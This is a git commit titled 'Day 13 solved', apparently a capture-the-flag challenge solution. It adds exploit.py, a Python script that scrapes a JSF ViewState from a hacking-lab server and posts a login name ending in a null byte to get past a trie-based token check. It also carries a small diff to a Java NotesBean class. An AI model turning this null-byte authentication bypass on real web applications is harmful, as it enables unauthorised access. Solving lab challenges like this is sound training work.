Day 13 solved

This commit is contained in:
Roman Hergenreder 2019-12-13 21:33:46 +01:00
parent f36aa42aa9
commit 97efd59a23
2 changed files with 48 additions and 12 deletions

@ -46,6 +46,7 @@ public class NotesBean implements Serializable {
private static PatriciaTrie<Integer> init(){ private static PatriciaTrie<Integer> init(){
PatriciaTrie<Integer> trie = new PatriciaTrie<Integer>(); PatriciaTrie<Integer> trie = new PatriciaTrie<Integer>();
trie.put(securitytoken,0); trie.put(securitytoken,0);
return trie; return trie;
} }
@ -56,4 +57,5 @@ public class NotesBean implements Serializable {
private static InputStream getStreamFromResourcesFolder(String filePath) { private static InputStream getStreamFromResourcesFolder(String filePath) {
return Thread.currentThread().getContextClassLoader().getResourceAsStream(filePath); return Thread.currentThread().getContextClassLoader().getResourceAsStream(filePath);
} }
} }

34
Day 13/exploit.py Normal file

@ -0,0 +1,34 @@
#!/usr/bin/python
import requests
from bs4 import BeautifulSoup as bs
URL = "http://whale.hacking-lab.com:8888/trieme/index.xhtml"
session = requests.session()
# Get view state
response = session.get(URL)
if response.status_code != 200:
print("Server returned %d %s" % (response.status_code, response.reason))
exit(1)
html = bs(response.text, 'lxml')
viewState = html.find("input", { "id": "javax.faces.ViewState" })
if viewState is None:
print("Could not find javax.faces.ViewState")
exit(2)
params = {
"j_idt14": "j_idt14",
"j_idt14:j_idt15": "login",
"j_idt14:name": "auth_token_4835989\0",
"javax.faces.ViewState": viewState['value']
}
response = session.post(URL, data=params)
if response.status_code != 200:
print("Server returned %d %s" % (response.status_code, response.reason))
exit(1)
print(response.text)